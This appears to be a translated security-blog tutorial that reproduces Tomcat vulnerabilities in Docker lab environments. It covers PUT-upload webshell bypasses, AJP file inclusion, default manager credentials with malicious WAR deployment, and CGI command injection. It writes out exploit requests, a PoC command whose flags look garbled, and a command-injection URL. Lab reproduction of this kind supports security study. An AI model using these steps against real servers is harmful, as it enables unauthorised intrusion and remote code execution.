How to Exploit Critical Tomcat Vulnerabilities (CVE‑2017‑12615, CVE‑2020‑1938, CVE‑2019‑0232) Step‑by‑Step

简介

Tomcat is a core project of the Apache Software Foundation's Jakarta initiative, jointly developed by Apache, Sun and many contributors. With Sun's involvement, Tomcat quickly adopts the latest Servlet and JSP specifications; Tomcat 5 supports Servlet 2.4 and JSP 2.0. Its advanced technology, stable performance and zero cost make it popular among Java developers and some software vendors as a lightweight web‑application server.

Tomcat runs as an independent process and can be used alongside Apache HTTP Server; when configured correctly Apache serves static HTML while Tomcat handles JSP and Servlet requests. Tomcat’s static‑file handling is weaker than Apache’s. The latest Tomcat version referenced in the article is 10.0.5.

CVE-2017-12615

This vulnerability allows arbitrary file write in Tomcat 7.0.0‑7.0.81 when the readonly attribute in conf/web.xml is set to false. The misconfiguration enables HTTP PUT uploads of any file (except files with a .jsp extension).

漏洞原理

Because readonly is set to false in conf/web.xml, an attacker can use the HTTP PUT method to upload arbitrary files, though JSP uploads are initially blocked.

On Windows, setting readonly to false allows a JSP file to be created via PUT and executed.

漏洞复现

Using the vuluhub Docker environment: sudo docker-compose up -d Enter the container and view conf/web.xml to confirm readonly is false.

sudo docker exec -ti ec bash

cat conf/web.xml | grep readonly

Upload a test file via PUT:

PUT /test.txt HTTP/1.1

testpoc

The server returns 201, indicating success. The uploaded file can be verified inside the container’s webapps/ROOT directory.

Three bypass methods for uploading a JSP payload are demonstrated:

Appending a space (%20) to the filename on Windows (e.g., PUT /a001.jsp%20 HTTP/1.1).

Using a trailing slash (e.g., PUT /a001.jsp/ HTTP/1.1).

Appending the NTFS stream delimiter ::$DATA (e.g., PUT /a001.jsp::$DATA HTTP/1.1).

Each method results in a 201 response and the JSP file appears in the container, allowing execution of a webshell.

CVE-2020-1938

This is the Tomcat AJP file‑inclusion vulnerability discovered by LongTreat security researchers. The flaw resides in the AJP connector (default port 8009) and permits reading or including any file under webapps, potentially leading to remote code execution when combined with file‑upload functionality.

漏洞原理

Tomcat configures two connectors: HTTP (default 8080) and AJP (default 8009). The AJP processor extracts request attributes and passes them to the servlet engine. By manipulating attributes such as javax.servlet.include.request_uri, an attacker can force Tomcat to include arbitrary files.

漏洞复现

Start the Docker environment for CVE‑2020‑1938, then run a Python PoC to enumerate files via the AJP port:

git clone https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi

cd CNVD-2020-10487-Tomcat-Ajp-lfi

python CNVD-2020-10487-Tomcat-Ajp-lfi.py -p 192.168.1.8 -p 8009 -f /WEB-INF/web.xml

After confirming file read access, a reverse shell payload is uploaded as test.txt and executed via a bash reverse‑shell command. The payload is then delivered to the target using the AJP connector, resulting in an interactive shell.

弱口令 & war 远程部署

Tomcat 8 ships with default manager credentials tomcat/tomcat. Attackers can log into http://<IP>:8080/manager/html, upload a malicious WAR (e.g., test.war containing ice.jsp), and obtain a webshell.

Steps:

Start the Tomcat 8 Docker container.

Access the manager UI with the default credentials.

Upload the crafted WAR file.

Visit the deployed context to trigger the shell (e.g., via IceSpear).

Metasploit’s exploit/multi/http/tomcat_mgr_upload module can automate this process, delivering a java/jsp_shell_reverse_tcp payload.

CVE-2019-0232

This Tomcat CGI servlet RCE vulnerability arises when enableCmdLineArguments is true and executable is empty. On Windows, Runtime.exec ultimately invokes CreateProcess, which concatenates arguments into a command line and runs cmd.exe without proper escaping, allowing arbitrary command execution.

漏洞原理

The CGI servlet reads URL parameters, builds a command line, and executes it. When the target is a .bat file on Windows, the command line becomes cmd.exe /c "file.bat & dir", enabling command injection.

漏洞复现

Enable the CGI servlet in conf/web.xml by uncommenting the servlet definition and adding:

<init-param><param-name>enableCmdLineArguments</param-name><param-value>true</param-value></init-param>

<init-param><param-name>executable</param-name><param-value></param-value></init-param>

Map the servlet to /cgi-bin/* and set privileged="true" in conf/context.xml. Create WEB-INF/cgi-bin/hello.bat with a simple command (e.g., calc.exe) and restart Tomcat. Access

http://localhost:8080/cgi-bin/hello.bat?&C%3A%5CWindows%5CSystem32%5Ccalc.exe

to trigger the payload.

These examples illustrate how misconfigurations and default settings in Tomcat can be leveraged for remote code execution, file inclusion, and privilege escalation.